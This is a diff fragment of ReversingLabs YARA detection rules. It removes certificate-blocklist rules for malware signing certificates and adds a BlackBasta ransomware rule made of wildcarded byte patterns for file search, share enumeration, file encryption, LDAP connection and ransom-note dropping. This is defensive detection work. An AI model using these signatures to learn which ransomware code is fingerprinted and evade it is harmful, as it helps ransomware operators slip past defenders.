+            ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 50 8D
+            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB
+            ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 ?? ?? ?? ?? 8B 55 ?? C1 E2 ??
+            8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? C1
+            E0 ?? 8B 4D ?? 8B 54 01 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 6A ?? 8B 45 ?? 50
+            8B 4D ?? C1 E1 ?? 8B 55 ?? 8B 44 0A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8B 4D ?? 51
+            8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ??
+            8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? C1 E1 ?? 03 4D
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MC Commerce SP Z o o" and ( pe.signatures [ i ] . serial == "00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures [ i ] . serial == "b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" ) and 1585785600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $file_search and $enum_shares and $file_encrypt_1 and $file_encrypt_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects BlackBasta ransomware."
 		author = "ReversingLabs"
-		id = "96219c86-f463-5f11-950d-ca2af75d5559"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb"
+		date = "2022-12-13"
+		modified = "2022-12-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5424-L5442"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f"
 		score = 75
-		quality = 90
-		tags = "INFO, FILE"
+		quality = 88
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "BlackBasta"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEHANIKUM OOO" and ( pe.signatures [ i ] . serial == "00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures [ i ] . serial == "f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" ) and 1599031121 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L5444-L5462"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6
+            E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ??
+            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88
+            9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75
+            ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15
+        }
+		$encrypt_files_v1 = {
+            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
+            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5
+            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
+            ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
+            ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+        }
+		$cmd_prompt = {
+            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB
+            68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ??
+            ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75
+            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ??
+            ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8
+            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ??
+            83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D
+            45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ??
+            83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53
+        }
+		$ldap_connect = {
+            C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ??
+            50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6
+            6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ??
+            ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B
+            06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D
+            ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ??
+            8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF
+            50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D
+            ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15
+        }
+		$encrypt_files_v2 = {
+            8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B
+            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75
+            ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8
+            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+        }
+		$encrypt_files_v3 = {
+            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
+            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
+            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6
+            45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ??
+            89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ??
+            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45
+            ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$encrypt_files_v4 = {
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ??
+            8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ??
+            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B
+            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85
+            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B
+            50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+        }
+		$drop_ransom_note_v1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00
+            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
+            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$exclude_from_encryption_v1 = {
+            83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
+            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8
+            ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B
+            F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ??
+            8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
+        }
+		$exclude_from_encryption_v2_p1 = {
+            50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ??
+            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6
+        }
+		$exclude_from_encryption_v2_p2 = {
+            45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ??
+            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+        }
+		$encrypt_files_v5_p1 = {
+            50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ??
+            ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
+            8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83
+            C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ??
+            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
